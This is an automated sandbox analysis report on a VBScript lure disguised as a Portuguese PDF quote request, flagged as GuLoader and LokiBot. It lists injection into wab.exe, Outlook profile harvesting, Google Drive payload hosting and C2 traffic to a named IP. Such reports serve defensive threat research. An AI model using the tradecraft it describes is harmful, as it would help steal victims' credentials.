Malware Analysis Report

2025-05-06 00:00

Sample ID: 240321-vmzqxscg24
Target: Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
SHA256: 18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad
Tags: guloader lokibot collection downloader spyware stealer trojan
Score: 10/10

Analysis Overview

score
10/10

SHA256

18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad

Threat Level: Known bad

The file Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection downloader spyware stealer trojan

Guloader,Cloudeye

Lokibot

Checks computer location settings

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

outlook_win_path

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-21 17:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-21 17:07

Reported

2024-03-21 17:09

Platform

win7-20240221-en

Max time kernel

146s

Max time network

123s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2076 set thread context of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 1712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1968 wrote to memory of 1712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1968 wrote to memory of 1712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 2360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 2360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 2076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
NL 142.250.179.142:443 drive.google.com tcp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YL3K1WDEVXVYMXV84ERM.temp


C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015


C:\Users\Admin\AppData\Local\Temp\CabA40C.tmp


C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2297530677-1229052932-2803917579-1000\0f5007522459c86e95ffcc62f32308f1_63be8c66-23f0-4400-84bb-c1a439222555


Analysis: behavioral2

Detonation Overview

Submitted

2024-03-21 17:07

Reported

2024-03-21 17:09

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"

Signatures

Lokibot

trojan spyware stealer lokibot

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4956 set thread context of 1088 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4824 wrote to memory of 3484 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 3484 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 2948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3484 wrote to memory of 2948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3484 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4956 wrote to memory of 1088 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3180 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wr3xaxqx.gts.ps1
